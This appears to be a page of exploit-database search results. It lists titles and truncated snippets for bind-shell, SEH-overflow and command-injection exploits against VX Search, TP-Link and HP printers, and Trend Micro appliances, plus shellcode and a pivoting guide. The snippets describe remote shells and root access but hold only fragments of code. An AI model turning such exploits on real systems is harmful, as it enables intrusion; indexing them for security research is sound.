395 matches found
VXSearch 10.2.14 Local SEH Overflow
!/usr/bin/env python Exploit Title : VXSearch v10.2.14 Local SEH Overflow Date : 11/16/2017 Exploit Author : wetw0rk Vendor Homepage : http://www.flexense.com/ Software link : http://www.vxsearch.com/setups/vxsearchentsetupv10.2.14.exe Version : 10.2.14 Tested on : Windows 7 x86 Description : VX...
VX Search 10.2.14 - Proxy Local Buffer Overflow (SEH)
VX Search 10.2.14 - Proxy Local Buffer Overflow SEH !/usr/bin/env python Exploit Title : VXSearch v10.2.14 Local SEH Overflow Date : 11/16/2017 Exploit Author : wetw0rk Vendor Homepage : http://www.flexense.com/ Software link : http://www.vxsearch.com/setups/vxsearchentsetupv10.2.14.exe Version :...
VX Search 10.2.14 - 'Proxy' Local Buffer Overflow (SEH)
!/usr/bin/env python Exploit Title : VXSearch v10.2.14 Local SEH Overflow Date : 11/16/2017 Exploit Author : wetw0rk Vendor Homepage : http://www.flexense.com/ Software link : http://www.vxsearch.com/setups/vxsearchentsetupv10.2.14.exe Version : 10.2.14 Tested on : Windows 7 x86 Description : VX...
CoolPlayer+ Portable 2.19.6 Stack Overflow
Exploit Title: CoolPlayer+ Portable 2.19.6 Stack Overflow ASLR Bypass/Bind Shell Exploit Author: 1N3@CrowdShield - https://crowdshield.com Download link:...
TP-Link WR940N - Authenticated Remote Code Exploit Exploit
Exploit for hardware platform in category web applications import urllib2 import base64 import hashlib from optparse import import sys import urllibbanner = "\n" "WR940N Authenticated Remote Code Exploit\n" "This exploit will open a bind shell on the remote target\n" "The port is 31337, you can...
TP-Link WR940N - (Authenticated) Remote Code
TP-Link WR940N - Authenticated Remote Code import urllib2 import base64 import hashlib from optparse import import sys import urllibbanner = "\n" "WR940N Authenticated Remote Code Exploit\n" "This exploit will open a bind shell on the remote target\n" "The port is 31337, you can change that in th...
LFiFreak - An automated LFi Exploiter with Bind/Reverse Shells
LFiFreak is a tool for exploiting local file inclusions using PHP Input, PHP Filter and Data URI methods. Features Works with Windows, Linux and OS X Includes bind and reverse shell for both Windows and Linux Written in Python 2.7 Dependencies BeautifulSoup Download LFiFreak...
Linux/x86 - Bind Shell Shellcode (75 bytes)
Linux/x86 - Bind Shell Shellcode 75 bytes. Shellcode exploit for Linx86 platform / Architecture : x86 OS : Linux Author : wetw0rk ID : SLAE-958 Shellcode Size : 75 bytes Bind Port : 4444 Description : A linux/x86 bind shell via /bin/sh. Created by analysing msfvenom; original payload was 78 bytes...
Linux/x86 - Bind Shell Shellcode (75 bytes)
/ Architecture : x86 OS : Linux Author : wetw0rk ID : SLAE-958 Shellcode Size : 75 bytes Bind Port : 4444 Description : A linux/x86 bind shell via /bin/sh. Created by analysing msfvenom; original payload was 78 bytes and contained 1 NULL. My shellcode is 75 and contains 0 NULLS ;. Original...
HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution Exp
Exploit for hardware platform in category remote exploits Create a bind shell on an unpatched OfficeJet 8210 Write a script to profile.d and reboot the device. When it comes back online then nc to port 1270. easysnmp instructions: sudo apt-get install libsnmp-dev pip install easysnmp import socke...
HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution
No description provided by source. Create a bind shell on an unpatched OfficeJet 8210 Write a script to profile.d and reboot the device. When it comes back online then nc to port 1270. easysnmp instructions: sudo apt-get install libsnmp-dev pip install easysnmp import socket import sys from...
HP PageWide / OfficeJet Pro Printers Arbitrary Code Execution
Create a bind shell on an unpatched OfficeJet 8210 Write a script to profile.d and reboot the device. When it comes back online then nc to port 1270. easysnmp instructions: sudo apt-get install libsnmp-dev pip install easysnmp import socket import sys from easysnmp import snmpset profiledscript =...
Trend Micro Threat Discovery Appliance <= 2.6.1062r1 admin_sys_time.cgi Command Injection Remote Code Execution Vulnerability Raw(CVE-2016-8585)
Summary: There exists a post authenticated command injection vulnerability that can be used to execute arbitrary code as root. Notes: - Since this is a busybox, getting a connectback seemed hard. So, for this particular PoC, all I did was exec a bind shell using netcat. - Auth is VERY weak, no...
Trend Micro Threat Discovery Appliance 2.6.1062r1 log_query_system.cgi Remote Code Execution Exploit
Trend Micro Threat Discovery Appliance versions 2.6.1062r1 and below suffer from a logquerysystem.cgi remote code execution vulnerability. !/usr/local/bin/python """ Trend Micro Threat Discovery Appliance + eg: ./poc.py 172.16.175.123 admin123 saturn:trendmicrothreatdiscoverylogquerysystemrce mrm...
Trend Micro Threat Discovery Appliance 2.6.1062r1 log_query_dlp.cgi Remote Code Execution
!/usr/local/bin/python """ Trend Micro Threat Discovery Appliance + eg: ./poc.py 172.16.175.123 admin123 saturn:trendmicrothreatdiscoverylogquerydlprce mrme$ ./poc.py 172.16.175.123 admin + logged in... + starting backdoor, this will take a few secs... + calling backdoor! id uid=0root gid=0root...
Trend Micro Threat Discovery Appliance 2.6.1062r1 admin_sys_time.cgi Remote Code Execution Exploit
Trend Micro Threat Discovery Appliance versions 2.6.1062r1 and below suffer from a adminsystime.cgi remote code execution vulnerability. !/usr/local/bin/python """ Trend Micro Threat Discovery Appliance + eg: ./poc.py 172.16.175.123 admin123 saturn:trendmicrothreatdiscoveryadminsystimerce mrme$...
Trend Micro Threat Discovery Appliance 2.6.1062r1 dlp_policy_upload.cgi Remote Code Execution
!/usr/local/bin/python """ Trend Micro Threat Discovery Appliance /opt/TrendMicro/MinorityReport/bin/ Then, all we do is create /engptnstores/prod/sensorSDK/data/si/dlpkill.sh with malicious code and get it executed... Notes: ====== - For this particular PoC, all I did was exec a bind shell using...
Trend Micro Threat Discovery Appliance 2.6.1062r1 log_query.cgi Remote Code Execution Exploit
Trend Micro Threat Discovery Appliance versions 2.6.1062r1 and below suffer from a logquery.cgi remote code execution vulnerability. !/usr/local/bin/python """ Trend Micro Threat Discovery Appliance + eg: ./poc.py 172.16.175.123 admin123 saturn:trendmicrothreatdiscoverylogqueryrce mrme$ ./poc.py...
Trend Micro Threat Discovery Appliance 2.6.1062r1 admin_sys_time.cgi Remote Code Execution
!/usr/local/bin/python """ Trend Micro Threat Discovery Appliance + eg: ./poc.py 172.16.175.123 admin123 saturn:trendmicrothreatdiscoveryadminsystimerce mrme$ ./poc.py 172.16.175.123 admin123 + logged in... + starting backdoor, this will take a few secs... + calling backdoor! id uid=0root gid=0ro...
A Red Teamer’s guide to pivoting
A Red Teamer’s guide to pivoting A Red Teamer's guide to pivoting Penetration testers often traverse logical network boundaries in order to gain access to client’s critical infrastracture. Common scenarios include developing the attack into the internal network after successful perimeter breach o...